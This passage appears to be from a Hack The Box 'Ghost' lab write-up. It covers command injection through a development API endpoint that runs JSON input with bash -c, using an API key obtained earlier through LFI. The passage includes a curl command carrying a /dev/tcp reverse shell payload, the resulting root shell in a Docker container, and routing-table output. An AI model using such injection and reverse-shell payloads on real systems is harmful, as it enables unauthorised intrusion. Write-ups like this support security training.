RCE
/scanis the API endpoint, which must come after the dev API endpoint;/api-dev- It takes POST requests with JSON data
- User supplied JSON data is EXECUTED via
bash -ccommand - It’s locked behind an API key;
DEV_INTRANET_KEY- It has already been retrieved via LFI;
DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe- Required header is
X-DEV-INTRANET-KEY
- Required header is
- It has already been retrieved via LFI;
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ curl http://intranet.ghost.htb:8008/api-dev/scan -X POST -H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' -H 'Content-Type: application/json' -d '{"url": "0<&196;exec 196<>/dev/tcp/10.10.14.58/9999; sh <&196 >&196 2>&196"}'Sending the reverse shell payload
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.58] from (UNKNOWN) [10.10.11.24] 61100
whoami
root
hostname
621de11273cb
cat /proc/net/fib_trie
Main:
+-- 0.0.0.0/0 3 0 5
|-- 0.0.0.0
/0 universe UNICAST
+-- 127.0.0.0/8 2 0 2
+-- 127.0.0.0/31 1 0 0
|-- 127.0.0.0
/8 host LOCAL
|-- 127.0.0.1
/32 host LOCAL
|-- 127.255.255.255
/32 link BROADCAST
+-- 172.18.0.0/16 2 0 2
+-- 172.18.0.0/30 2 0 2
|-- 172.18.0.0
/16 link UNICAST
|-- 172.18.0.3
/32 host LOCAL
|-- 172.18.255.255
/32 link BROADCAST
Local:
+-- 0.0.0.0/0 3 0 5
|-- 0.0.0.0
/0 universe UNICAST
+-- 127.0.0.0/8 2 0 2
+-- 127.0.0.0/31 1 0 0
|-- 127.0.0.0
/8 host LOCAL
|-- 127.0.0.1
/32 host LOCAL
|-- 127.255.255.255
/32 link BROADCAST
+-- 172.18.0.0/16 2 0 2
+-- 172.18.0.0/30 2 0 2
|-- 172.18.0.0
/16 link UNICAST
|-- 172.18.0.3
/32 host LOCAL
|-- 172.18.255.255
/32 link BROADCASTInitial Foothold established to one of the Docker containers as the root account via RCE
172.18.0.3